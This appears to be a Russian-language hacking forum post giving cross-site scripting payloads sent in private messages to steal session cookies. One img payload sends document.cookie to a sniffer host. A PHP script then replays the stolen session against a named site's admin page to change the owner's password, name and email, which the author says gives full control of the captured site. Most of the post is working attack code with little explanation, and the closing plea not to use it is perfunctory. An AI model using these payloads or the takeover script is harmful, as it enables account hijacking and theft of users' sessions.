Вот две XSS, позволяющие стянуть кукисы с помощью ядовитого письма. (отсылается, когда заходишь под своим аккаунтоми - шлёшь на чужой логин) <script src="javascript:alert(/ваш сниффер/);"></script> <iframe BORDER=0 HEIGHT=0 WIDTH=0 src="javascript:alert(/для сниффера тоже/);"></iframe>
Отрывок из моей статьи, кторую я все обещаю выложить, да все никак руки не доходят )) любой банальный XSS скрипт в ЛС, например: Code: <img src="[url="http://sasa/"]http://sasa[/url]" style="background:white url(javascript:document.images[0].src='http://sniff/s.php?'+document.cookie)"> Изменим пароль, имя с фамилией и емейл. (Кстати можно пойти от дефа и аж до удаления сайта, подтверждающих паролей нет нигде) PHP: <? $nick="PinkPanther";$mail="[email protected]";$new_password="123456"; $query=$_SERVER["QUERY_STRING"];$query=urldecode($query);$refer=getenv("HTTP_REFERER");$ref1=strpos($refer,"id=")+3; $session=substr($refer,$ref1,32); $post="sid=".$session."&act=send&uname=".$nick."&email=".$m ail."&passwd_1=".$new_password."&passwd_2=".$new_password."&pager_type=non&pager=&lang=rus&gpasswd=&is_news=on&is_notify=on&news_encoding=koi&news_lang=rus&%C8%E7%EC%E5%ED% E8%F2%FC=%C8%E7%EC%E5%ED%E8%F2%FC"; $len=strlen($post); $header="POST http://sitecity.ru/adm_base.phtml HTTP/1.0 ";$header.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */* ";$header.="Referer: http://sitecity.ru/adm_base.phtml?sid=".$session." ";$header.="Content-Type: application/x-www-form-urlencoded ";$header.="Host: sitecity.ru ";$header.="Content-Length: $len ";$header.="Cookie: ".$query." ";$header.=" ";$header.=$post; $fp=fsockopen("sitecity.ru", 80); fwrite($fp, $header); fclose($fp); ?> Вот так вот. Теперь мы имеем полный контроль над захваченным сайтом. Еще хочу заметить, что на этом, баги не заканчиваются)) Так же, прочитавших это, по человечески прошу никогда не делать подобное: